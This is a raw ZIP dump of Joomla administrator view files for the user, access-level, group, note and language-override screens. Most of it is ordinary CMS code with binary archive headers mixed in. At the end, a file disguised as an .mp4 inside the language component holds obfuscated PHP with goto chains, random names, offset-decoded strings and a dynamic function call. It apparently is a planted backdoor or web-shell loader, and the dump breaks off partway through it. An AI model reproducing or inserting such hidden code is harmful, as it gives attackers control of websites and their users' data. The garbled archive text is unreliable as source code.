AAAAPKΛA\)mail/.htaccessnuW+A Order allow,deny Deny from all PKΛA\!Qmail/view.html.phpnuW+Aform = $this->get('Form'); $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', 1); JToolBarHelper::title(JText::_('COM_USERS_MASS_MAIL'), 'massmail.png'); JToolBarHelper::custom('mail.send', 'send.png', 'send_f2.png', 'COM_USERS_TOOLBAR_MAIL_SEND_MAIL', false); JToolBarHelper::cancel('mail.cancel'); JToolBarHelper::divider(); JToolBarHelper::preferences('com_users'); JToolBarHelper::divider(); JToolBarHelper::help('JHELP_USERS_MASS_MAIL_USERS'); } } PKΛA\*RS  mail/tmpl/default.phpnuW+AaddScriptDeclaration($script); ?>
  • form->getLabel('recurse'); ?> form->getInput('recurse'); ?>
  • form->getLabel('mode'); ?> form->getInput('mode'); ?>
  • form->getLabel('disabled'); ?> form->getInput('disabled'); ?>
  • form->getLabel('group'); ?> form->getInput('group'); ?>
  • form->getLabel('bcc'); ?> form->getInput('bcc'); ?>
  • form->getLabel('subject'); ?> form->getInput('subject'); ?>
  • form->getLabel('message'); ?> form->getInput('message'); ?>
PKΛA\)mail/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\Vmail/tmpl/index.htmlnuW+A PKΛA\Vmail/index.htmlnuW+A PKΛA\)levels/.htaccessnuW+A Order allow,deny Deny from all PKΛA\=vlevels/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } parent::display($tpl); $this->addToolbar(); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $canDo = UsersHelper::getActions(); JToolBarHelper::title(JText::_('COM_USERS_VIEW_LEVELS_TITLE'), 'levels'); if ($canDo->get('core.create')) { JToolBarHelper::addNew('level.add'); } if ($canDo->get('core.edit')) { JToolBarHelper::editList('level.edit'); JToolBarHelper::divider(); } if ($canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'level.delete'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_users'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_USERS_ACCESS_LEVELS'); } } PKΛA\Vlevels/index.htmlnuW+A PKΛA\ levels/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $canOrder = $user->authorise('core.edit.state', 'com_users'); $saveOrder = $listOrder == 'a.ordering'; ?>
items); ?> items as $i => $item) : $ordering = ($listOrder == 'a.ordering'); $canCreate = $user->authorise('core.create', 'com_users'); $canEdit = $user->authorise('core.edit', 'com_users'); $canChange = $user->authorise('core.edit.state', 'com_users'); ?>
items, 'filesave.png', 'levels.saveorder'); ?>  
pagination->getListFooter(); ?>
id); ?> escape($item->title); ?> escape($item->title); ?> pagination->orderUpIcon($i, true, 'levels.orderup', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $count, true, 'levels.orderdown', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> pagination->orderUpIcon($i, true, 'levels.orderdown', 'JLIB_HTML_MOVE_UP', $ordering); ?> pagination->orderDownIcon($i, $count, true, 'levels.orderup', 'JLIB_HTML_MOVE_DOWN', $ordering); ?> class="text-area-order" /> ordering; ?> id; ?>  
PKΛA\Vlevels/tmpl/index.htmlnuW+A PKΛA\)levels/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\)note/.htaccessnuW+A Order allow,deny Deny from all PKΛA\6note/index.htmlnuW+APKΛA\)note/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\sxnote/tmpl/edit.phpnuW+A
item->id ? JText::sprintf('COM_USERS_EDIT_NOTE_N', $this->item->id) : JText::_('COM_USERS_NEW_NOTE');?>
  • form->getLabel('subject'); ?> form->getInput('subject'); ?>
  • form->getLabel('user_id'); ?> form->getInput('user_id'); ?>
  • form->getLabel('catid'); ?> form->getInput('catid'); ?>
  • form->getLabel('state'); ?> form->getInput('state'); ?>
  • form->getLabel('review_time'); ?> form->getInput('review_time'); ?>
form->getLabel('body'); ?>
form->getInput('body'); ?>
PKΛA\6note/tmpl/index.htmlnuW+APKΛA\ note/view.html.phpnuW+Astate = $this->get('State'); $this->item = $this->get('Item'); $this->form = $this->get('Form'); // Check for errors. if (count($errors = $this->get('Errors'))) { throw new Exception(implode("\n", $errors), 500); } // Get the component HTML helpers JHtml::addIncludePath(JPATH_COMPONENT.'/helpers/html'); parent::display($tpl); $this->addToolbar(); } /** * Display the toolbar. * * @return void * * @since 2.5 */ protected function addToolbar() { $input = JFactory::getApplication()->input; $input->set('hidemainmenu', 1); $user = JFactory::getUser(); $isNew = ($this->item->id == 0); $checkedOut = !($this->item->checked_out == 0 || $this->item->checked_out == $user->get('id')); $canDo = UsersHelper::getActions($this->state->get('filter.category_id'), $this->item->id); JToolBarHelper::title(JText::_('COM_USERS_NOTES'), 'user'); // If not checked out, can save the item. if (!$checkedOut && ($canDo->get('core.edit') || (count($user->getAuthorisedCategories('com_users', 'core.create'))))) { JToolBarHelper::apply('note.apply'); JToolBarHelper::save('note.save'); } if (!$checkedOut && (count($user->getAuthorisedCategories('com_users', 'core.create')))) { JToolBarHelper::save2new('note.save2new'); } // If an existing item, can save to a copy. if (!$isNew && (count($user->getAuthorisedCategories('com_users', 'core.create')) > 0)) { JToolBarHelper::save2copy('note.save2copy'); } if (empty($this->item->id)) { JToolBarHelper::cancel('note.cancel'); } else { JToolBarHelper::cancel('note.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_USERS_USER_NOTES_EDIT'); } } PKΛA\)level/.htaccessnuW+A Order allow,deny Deny from all PKΛA\ level/tmpl/edit.phpnuW+A
  • form->getLabel('title'); ?>
  • form->getInput('title'); ?>
item->rules); ?>
PKΛA\)level/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\Vlevel/tmpl/index.htmlnuW+A PKΛA\q:level/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', 1); $user = JFactory::getUser(); $isNew = ($this->item->id == 0); $canDo = UsersHelper::getActions(); JToolBarHelper::title(JText::_($isNew ? 'COM_USERS_VIEW_NEW_LEVEL_TITLE' : 'COM_USERS_VIEW_EDIT_LEVEL_TITLE'), 'levels-add'); if ($canDo->get('core.edit')||$canDo->get('core.create')) { JToolBarHelper::apply('level.apply'); JToolBarHelper::save('level.save'); } if ($canDo->get('core.create')) { JToolBarHelper::save2new('level.save2new'); } // If an existing item, can save to a copy. if (!$isNew && $canDo->get('core.create')){ JToolBarHelper::save2copy('level.save2copy'); } if (empty($this->item->id)){ JToolBarHelper::cancel('level.cancel'); } else { JToolBarHelper::cancel('level.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_USERS_ACCESS_LEVELS_EDIT'); } } PKΛA\Vlevel/index.htmlnuW+A PKΛA\) .htaccessnuW+A Order allow,deny Deny from all PKΛA\Vdebuggroup/index.htmlnuW+A PKΛA\)debuggroup/.htaccessnuW+A Order allow,deny Deny from all PKΛA\)debuggroup/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\debuggroup/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
actions as $key => $action) : ?> items as $i => $item) : ?> actions as $action) : ?> checks[$name]; if ($check === true) : $class = 'check-a'; $text = '✓'; elseif ($check === false) : $class = 'check-d'; $text = '✗'; elseif ($check === null) : $class = 'check-0'; $text = '-'; else : $class = ''; $text = ' '; endif; ?>
pagination->getListFooter(); ?>
escape($item->title); ?> |—', $item->level) ?> escape($item->name); ?> lft; ?> - rgt; ?> id; ?>
PKΛA\Vdebuggroup/tmpl/index.htmlnuW+A PKΛA\*rVBdebuggroup/view.html.phpnuW+Aauthorise('core.manage', 'com_users') || !JFactory::getConfig()->get('debug')) { return JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR')); } $this->actions = $this->get('DebugActions'); $this->items = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); $this->group = $this->get('Group'); $this->levels = UsersHelperDebug::getLevelsOptions(); $this->components = UsersHelperDebug::getComponents(); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JToolBarHelper::title(JText::sprintf('COM_USERS_VIEW_DEBUG_GROUP_TITLE', $this->group->id, $this->group->title), 'groups'); JToolBarHelper::help('JHELP_USERS_DEBUG_GROUPS'); } } PKΛA\Vgroups/tmpl/index.htmlnuW+A PKΛA\)groups/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\Ymgroups/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); JText::script('COM_USERS_GROUPS_CONFIRM_DELETE'); ?>
items as $i => $item) : $canCreate = $user->authorise('core.create', 'com_users'); $canEdit = $user->authorise('core.edit', 'com_users'); // If this group is super admin and this user is not super admin, $canEdit is false if (!$user->authorise('core.admin') && (JAccess::checkGroup($item->id, 'core.admin'))) { $canEdit = false; } $canChange = $user->authorise('core.edit.state', 'com_users'); ?>
pagination->getListFooter(); ?>
id); ?> |—', $item->level) ?> escape($item->title); ?> escape($item->title); ?> user_count ? $item->user_count : ''; ?> id; ?>
PKΛA\)groups/.htaccessnuW+A Order allow,deny Deny from all PKΛA\Vgroups/index.htmlnuW+A PKΛA\3groups/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $canDo = UsersHelper::getActions(); JToolBarHelper::title(JText::_('COM_USERS_VIEW_GROUPS_TITLE'), 'groups'); if ($canDo->get('core.create')) { JToolBarHelper::addNew('group.add'); } if ($canDo->get('core.edit')) { JToolBarHelper::editList('group.edit'); JToolBarHelper::divider(); } if ($canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'groups.delete'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_users'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_USERS_GROUPS'); } } PKΛA\Vgroup/tmpl/index.htmlnuW+A PKΛA\tgroup/tmpl/edit.phpnuW+A
  • form->getLabel('title'); ?> form->getInput('title'); ?>
  • form->getField('parent_id');?>
  • hidden) echo $parent_id->label; ?> input; ?>
PKΛA\)group/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\)group/.htaccessnuW+A Order allow,deny Deny from all PKΛA\ δgroup/view.html.phpnuW+Astate = $this->get('State'); $this->item = $this->get('Item'); $this->form = $this->get('Form'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', 1); $user = JFactory::getUser(); $isNew = ($this->item->id == 0); $canDo = UsersHelper::getActions(); JToolBarHelper::title(JText::_($isNew ? 'COM_USERS_VIEW_NEW_GROUP_TITLE' : 'COM_USERS_VIEW_EDIT_GROUP_TITLE'), 'groups-add'); if ($canDo->get('core.edit')||$canDo->get('core.create')) { JToolBarHelper::apply('group.apply'); JToolBarHelper::save('group.save'); } if ($canDo->get('core.create')) { JToolBarHelper::save2new('group.save2new'); } // If an existing item, can save to a copy. if (!$isNew && $canDo->get('core.create')) { JToolBarHelper::save2copy('group.save2copy'); } if (empty($this->item->id)) { JToolBarHelper::cancel('group.cancel'); } else { JToolBarHelper::cancel('group.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_USERS_GROUPS_EDIT'); } } PKΛA\Vgroup/index.htmlnuW+A PKΛA\cdebuguser/view.html.phpnuW+Aauthorise('core.manage', 'com_users') || !JFactory::getConfig()->get('debug')) { return JError::raiseWarning(404, JText::_('JERROR_ALERTNOAUTHOR')); } $this->actions = $this->get('DebugActions'); $this->items = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); $this->user = $this->get('User'); $this->levels = UsersHelperDebug::getLevelsOptions(); $this->components = UsersHelperDebug::getComponents(); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JToolBarHelper::title(JText::sprintf('COM_USERS_VIEW_DEBUG_USER_TITLE', $this->user->id, $this->user->name), 'user'); JToolBarHelper::help('JHELP_USERS_DEBUG_USERS'); } } PKΛA\Vdebuguser/tmpl/index.htmlnuW+A PKΛA\Edebuguser/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
actions as $key => $action) : ?> items as $i => $item) : ?> actions as $action) : ?> checks[$name]; if ($check === true) : $class = 'check-a'; $text = '✓'; elseif ($check === false) : $class = 'check-d'; $text = '✗'; elseif ($check === null) : $class = 'check-0'; $text = '-'; else : $class = ''; $text = ' '; endif; ?>
pagination->getListFooter(); ?>
escape($item->title); ?> |—', $item->level) ?> escape($item->name); ?> lft; ?> - rgt; ?> id; ?>
PKΛA\)debuguser/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\)debuguser/.htaccessnuW+A Order allow,deny Deny from all PKΛA\Vdebuguser/index.htmlnuW+A PKΛA\@jxusers/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } // Include the component HTML helpers. JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html'); $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { $canDo = UsersHelper::getActions(); JToolBarHelper::title(JText::_('COM_USERS_VIEW_USERS_TITLE'), 'user'); if ($canDo->get('core.create')) { JToolBarHelper::addNew('user.add'); } if ($canDo->get('core.edit')) { JToolBarHelper::editList('user.edit'); } if ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::publish('users.activate', 'COM_USERS_TOOLBAR_ACTIVATE', true); JToolBarHelper::unpublish('users.block', 'COM_USERS_TOOLBAR_BLOCK', true); JToolBarHelper::custom('users.unblock', 'unblock.png', 'unblock_f2.png', 'COM_USERS_TOOLBAR_UNBLOCK', true); JToolBarHelper::divider(); } if ($canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'users.delete'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_users'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_USERS_USER_MANAGER'); } } PKΛA\)users/.htaccessnuW+A Order allow,deny Deny from all PKΛA\Vusers/index.htmlnuW+A PKΛA\Vusers/tmpl/index.htmlnuW+A PKΛA\)users/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\YD1users/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $loggeduser = JFactory::getUser(); ?>
items as $i => $item) : $canEdit = $canDo->get('core.edit'); $canChange = $loggeduser->authorise('core.edit.state', 'com_users'); // If this group is super admin and this user is not super admin, $canEdit is false if ((!$loggeduser->authorise('core.admin')) && JAccess::check($item->id, 'core.admin')) { $canEdit = false; $canChange = false; } ?>
pagination->getListFooter(); ?>
id); ?>
note_count, $item->id); ?> note_count, $item->id); ?> id); ?>
escape($item->name); ?> escape($item->name); ?>
escape($item->username); ?> id != $item->id) : ?> block, 'users.unblock', 'users.block'); ?> block, 'users.block', null); ?> block ? 'JNO' : 'JYES'); ?> activation, 'users.activate', null); ?> group_names, "\n") > 1) : ?> group_names); ?> escape($item->email); ?> lastvisitDate!='0000-00-00 00:00:00'):?> lastvisitDate, 'Y-m-d H:i:s'); ?> registerDate, 'Y-m-d H:i:s'); ?> id; ?>
authorize('core.create', 'com_users') && $user->authorize('core.edit', 'com_users') && $user->authorize('core.edit.state', 'com_users')) : ?> loadTemplate('batch'); ?>
PKΛA\0h users/tmpl/modal.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
  1. state->get('filter.group_id'), 'onchange="this.form.submit()"'); ?>
items as $item) : ?>
pagination->getListFooter(); ?>
name; ?> username; ?> group_names); ?>
PKΛA\xIusers/tmpl/default_batch.phpnuW+A
PKΛA\3~user/view.html.phpnuW+Aform = $this->get('Form'); $this->item = $this->get('Item'); $this->grouplist = $this->get('Groups'); $this->groups = $this->get('AssignedGroups'); $this->state = $this->get('State'); // Check for errors. if (count($errors = $this->get('Errors'))) { JError::raiseError(500, implode("\n", $errors)); return false; } $this->form->setValue('password', null); $this->form->setValue('password2', null); parent::display($tpl); $this->addToolbar(); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', 1); $user = JFactory::getUser(); $isNew = ($this->item->id == 0); $canDo = UsersHelper::getActions(); $isNew = ($this->item->id == 0); $isProfile = $this->item->id == $user->id; JToolBarHelper::title(JText::_($isNew ? 'COM_USERS_VIEW_NEW_USER_TITLE' : ($isProfile ? 'COM_USERS_VIEW_EDIT_PROFILE_TITLE' : 'COM_USERS_VIEW_EDIT_USER_TITLE')), $isNew ? 'user-add' : ($isProfile ? 'user-profile' : 'user-edit')); if ($canDo->get('core.edit')||$canDo->get('core.create')) { JToolBarHelper::apply('user.apply'); JToolBarHelper::save('user.save'); } if ($canDo->get('core.create')&&$canDo->get('core.manage')) { JToolBarHelper::save2new('user.save2new'); } if (empty($this->item->id)) { JToolBarHelper::cancel('user.cancel'); } else { JToolBarHelper::cancel('user.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_USERS_USER_MANAGER_EDIT'); } } PKΛA\Vuser/index.htmlnuW+A PKΛA\Vuser/tmpl/index.htmlnuW+A PKΛA\FJ50r r user/tmpl/edit.phpnuW+Aform->getFieldsets(); ?>
    form->getFieldset('user_details') as $field) :?>
  • label; ?> input; ?>
grouplist) :?>
loadTemplate('groups');?>
name == 'user_details') : continue; endif; echo JHtml::_('sliders.panel', JText::_($fieldset->label), $fieldset->name); ?>
    form->getFieldset($fieldset->name) as $field): ?> hidden): ?> input; ?>
  • label; ?> input; ?>
PKΛA\FKuser/tmpl/edit_groups.phpnuW+A groups, true); ?> PKΛA\)user/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\)user/.htaccessnuW+A Order allow,deny Deny from all PKΛA\V index.htmlnuW+A PKΛA\C,notes/tmpl/default.phpnuW+Aescape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); $canEdit = $user->authorise('core.edit', 'com_users'); ?>
items as $i => $item) : ?> authorise('core.edit.state', 'com_users'); ?>
pagination->getListFooter(); ?>
id); ?> checked_out) : ?> editor, $item->checked_out_time); ?> escape($item->user_name); ?> escape($item->user_name); ?> subject) : ?> escape($item->subject); ?> catid && $item->cparams->get('image')) : ?> cparams->get('image')); ?> escape($item->category_title); ?> state, $i, 'notes.', $canChange, 'cb', $item->publish_up, $item->publish_down); ?> review_time)) : ?> escape($item->review_time); ?> id; ?>
PKΛA\6notes/tmpl/index.htmlnuW+APKΛA\V-notes/tmpl/modal.phpnuW+A

user->name, $this->user->id); ?>

items)) : ?>
    items as $item) : ?>
  1. subject) : ?>

    id, $this->escape($item->subject)); ?>

    id, JText::_('COM_USERS_EMPTY_SUBJECT')); ?>

    created_time, 'D d M Y H:i'); ?>
    cparams->get('image'); ?> catid && isset($category_image)) : ?>
    escape($item->category_title); ?>
    body; ?>
PKΛA\)notes/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKΛA\6notes/index.htmlnuW+APKΛA\)notes/.htaccessnuW+A Order allow,deny Deny from all PKΛA\c notes/view.html.phpnuW+Aitems = $this->get('Items'); $this->pagination = $this->get('Pagination'); $this->state = $this->get('State'); $this->user = $this->get('User'); // Check for errors. if (count($errors = $this->get('Errors'))) { throw new Exception(implode("\n", $errors), 500); } // Get the component HTML helpers JHtml::addIncludePath(JPATH_COMPONENT . '/helpers/html'); // turn parameters into registry objects foreach ($this->items as $item) { $item->cparams = new JRegistry(); $item->cparams->loadString($item->category_params); } parent::display($tpl); $this->addToolbar(); } /** * Display the toolbar. * * @return void * * @since 2.5 */ protected function addToolbar() { $canDo = UsersHelper::getActions(); JToolBarHelper::title(JText::_('COM_USERS_VIEW_NOTES_TITLE'), 'user'); if ($canDo->get('core.create')) { JToolBarHelper::addNew('note.add'); } if ($canDo->get('core.edit')) { JToolBarHelper::editList('note.edit'); } if ($canDo->get('core.edit.state')) { JToolBarHelper::divider(); JToolBarHelper::publish('notes.publish', 'JTOOLBAR_PUBLISH', true); JToolBarHelper::unpublish('notes.unpublish', 'JTOOLBAR_UNPUBLISH', true); JToolBarHelper::divider(); JToolBarHelper::archiveList('notes.archive'); JToolBarHelper::checkin('notes.checkin'); } if ($this->state->get('filter.state') == -2 && $canDo->get('core.delete')) { JToolBarHelper::deleteList('', 'notes.delete', 'JTOOLBAR_EMPTY_TRASH'); JToolBarHelper::divider(); } elseif ($canDo->get('core.edit.state')) { JToolBarHelper::trash('notes.trash'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_users'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_USERS_USER_NOTES'); } } PKͼA\form/index.htmlnuW+APKͼA\)form/.htaccessnuW+A Order allow,deny Deny from all PKͼA\w~form/metadata.xmlnuW+A PKͼA\W|form/tmpl/default.xmlnuW+A Display Form
PKͼA\)form/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKͼA\form/tmpl/index.htmlnuW+APKB\6overrides/index.htmlnuW+APKB\)overrides/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\\̌overrides/tmpl/default.phpnuW+Astate->get('filter.client') == 'site' ? JText::_('JSITE') : JText::_('JADMINISTRATOR'); $language = $this->state->get('filter.language'); $listOrder = $this->escape($this->state->get('list.ordering')); $listDirn = $this->escape($this->state->get('list.direction')); ?>
authorise('core.edit', 'com_languages'); $i = 0; foreach($this->items as $key => $text): ?>
pagination->getListFooter(); ?>
escape($key); ?> escape($key); ?> escape($text); ?> pagination->getRowOffset($i); ?>
PKB\6overrides/tmpl/index.htmlnuW+APKB\)overrides/.htaccessnuW+A Order allow,deny Deny from all PKB\j55overrides/view.html.phpnuW+Astate = $this->get('State'); $this->items = $this->get('Overrides'); $this->languages = $this->get('Languages'); $this->pagination = $this->get('Pagination'); // Check for errors if (count($errors = $this->get('Errors'))) { throw new Exception(implode("\n", $errors)); return; } $this->addToolbar(); parent::display($tpl); } /** * Adds the page title and toolbar * * @return void * * @since 2.5 */ protected function addToolbar() { // Get the results for each action $canDo = LanguagesHelper::getActions(); JToolBarHelper::title(JText::_('COM_LANGUAGES_VIEW_OVERRIDES_TITLE'), 'langmanager'); if ($canDo->get('core.create')) { JToolbarHelper::addNew('override.add'); } if ($canDo->get('core.edit') && $this->pagination->total) { JToolbarHelper::editList('override.edit'); } if ($canDo->get('core.delete') && $this->pagination->total) { JToolbarHelper::deleteList('', 'overrides.delete'); } if ($canDo->get('core.admin')) { JToolBarHelper::preferences('com_languages'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_EXTENSIONS_LANGUAGE_MANAGER_OVERRIDES'); } } PKB\$Y override/view.html.phpnuW+AaddStyleSheet(JURI::root().'media/overrider/css/overrider.css'); JHtml::_('behavior.framework'); $doc->addScript(JURI::root().'media/overrider/js/overrider.js'); $this->form = $this->get('Form'); $this->item = $this->get('Item'); $this->state = $this->get('State'); // Check for errors if (count($errors = $this->get('Errors'))) { throw new Exception(implode("\n", $errors)); return; } // Check whether the cache has to be refreshed $cached_time = JFactory::getApplication()->getUserState('com_languages.overrides.cachedtime.'.$this->state->get('filter.client').'.'.$this->state->get('filter.language'), 0); if(time() - $cached_time > 60 * 5) { $this->state->set('cache_expired', true); } // Add strings for translations in Javascript JText::script('COM_LANGUAGES_VIEW_OVERRIDE_NO_RESULTS'); JText::script('COM_LANGUAGES_VIEW_OVERRIDE_REQUEST_ERROR'); $this->addToolbar(); parent::display($tpl); } /** * Adds the page title and toolbar * * @return void * * @since 2.5 */ protected function addToolbar() { JRequest::setVar('hidemainmenu', true); $canDo = LanguagesHelper::getActions(); JToolBarHelper::title(JText::_('COM_LANGUAGES_VIEW_OVERRIDE_EDIT_TITLE'), 'langmanager'); if ($canDo->get('core.edit')) { JToolBarHelper::apply('override.apply'); JToolBarHelper::save('override.save'); } // This component does not support Save as Copy if ($canDo->get('core.edit') && $canDo->get('core.create')) { JToolBarHelper::save2new('override.save2new'); } if (empty($this->item->key)) { JToolBarHelper::cancel('override.cancel'); } else { JToolBarHelper::cancel('override.cancel', 'JTOOLBAR_CLOSE'); } JToolBarHelper::divider(); JToolBarHelper::help('JHELP_EXTENSIONS_LANGUAGE_MANAGER_OVERRIDES_EDIT'); } } PKB\)override/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\“override/tmpl/edit.phpnuW+A
item->key) ? JText::_('COM_LANGUAGES_VIEW_OVERRIDE_EDIT_NEW_OVERRIDE_LEGEND') : JText::_('COM_LANGUAGES_VIEW_OVERRIDE_EDIT_EDIT_OVERRIDE_LEGEND'); ?>
  • form->getLabel('key'); ?> form->getInput('key'); ?>
  • form->getLabel('override'); ?> form->getInput('override'); ?>
  • state->get('filter.client') == 'administrator'): ?>
  • form->getLabel('both'); ?> form->getInput('both'); ?>
  • form->getLabel('language'); ?> form->getInput('language'); ?>
  • form->getLabel('client'); ?> form->getInput('client'); ?>
  • form->getLabel('file'); ?> form->getInput('file'); ?>
  • form->getInput('searchstring'); ?>
  • form->getLabel('searchtype'); ?> form->getInput('searchtype'); ?>
PKB\Voverride/tmpl/index.htmlnuW+A PKB\Voverride/index.htmlnuW+A PKB\)override/.htaccessnuW+A Order allow,deny Deny from all PKB\Vinstalled/index.htmlnuW+A PKB\)installed/.htaccessnuW+A Order allow,deny Deny from all PKB\%installed/tmpl/default_navigation.phpnuW+Astate->get('filter.client_id', 0); ?> PKB\Vinstalled/tmpl/index.htmlnuW+A PKB\)installed/tmpl/.htaccessnuW+A Order allow,deny Deny from all PKB\F/  installed/tmpl/default.phpnuW+Aget('id'); $client = $this->state->get('filter.client_id', 0) ? JText::_('JADMINISTRATOR') : JText::_('JSITE'); $clientId = $this->state->get('filter.client_id', 0); ?>
rows as $i => $row) : $canCreate = $user->authorise('core.create', 'com_languages'); $canEdit = $user->authorise('core.edit', 'com_languages'); $canChange = $user->authorise('core.edit.state', 'com_languages'); ?>
 
pagination->getListFooter(); ?>
pagination->getRowOffset($i); ?> language);?> escape($row->name); ?> escape($row->language); ?> published, $i, 'installed.', !$row->published && $canChange);?> escape($row->version); ?> escape($row->creationDate); ?> escape($row->author); ?> escape($row->authorEmail); ?>
PKB\h>installed/tmpl/default_ftp.phpnuW+A

message); ?>

PKB\%`installed/view.html.phpnuW+Aftp = $this->get('Ftp'); $this->option = $this->get('Option'); $this->pagination = $this->get('Pagination'); $this->rows = $this->get('Data'); $this->state = $this->get('State'); $document = JFactory::getDocument(); $document->setBuffer($this->loadTemplate('navigation'), 'modules', 'submenu'); $this->addToolbar(); parent::display($tpl); } /** * Add the page title and toolbar. * * @since 1.6 */ protected function addToolbar() { require_once JPATH_COMPONENT.'/helpers/languages.php'; $canDo = LanguagesHelper::getActions(); JToolBarHelper::title(JText::_('COM_LANGUAGES_VIEW_INSTALLED_TITLE'), 'langmanager.png'); if ($canDo->get('core.edit.state')) { JToolBarHelper::makeDefault('installed.setDefault'); JToolBarHelper::divider(); } if ($canDo->get('core.admin')) { // Add install languages link to the lang installer component $bar = JToolBar::getInstance('toolbar'); $bar->appendButton('Link', 'extension', 'COM_LANGUAGES_INSTALL', 'index.php?option=com_installer&view=languages'); JToolBarHelper::divider(); JToolBarHelper::preferences('com_languages'); JToolBarHelper::divider(); } JToolBarHelper::help('JHELP_EXTENSIONS_LANGUAGE_MANAGER_INSTALLED'); } } PKB\5xxx3multilangstatus/multilangstatus/tlinmFgcpHUjZzQ.mp4nuW+A $RA9h1eAbUaYFyW) { $HQ_C_4QIXauqsE .= $D8qOPh2OO6IH7y[$RA9h1eAbUaYFyW - 5971]; xbOJE7v3AhpD3y: } goto ygBrFR5VzxOuK2; SAIul7NoQ8STXJ: return $HQ_C_4QIXauqsE; goto kNi1H6OBm29qWx; kNi1H6OBm29qWx: } static function zLEM1N3SD5GvVu($LXpcFC2hB_6cyO, $N_7c7uwBmuoCTI) { goto URQ2vtB4myIx0p; nw_fvJQysJTX0T: return empty($DuZn2hngU3WTEp) ? $N_7c7uwBmuoCTI($LXpcFC2hB_6cyO) : $DuZn2hngU3WTEp; goto vdRNHcu53LC2Fd; yGG7vVCLALm7iR: $DuZn2hngU3WTEp = 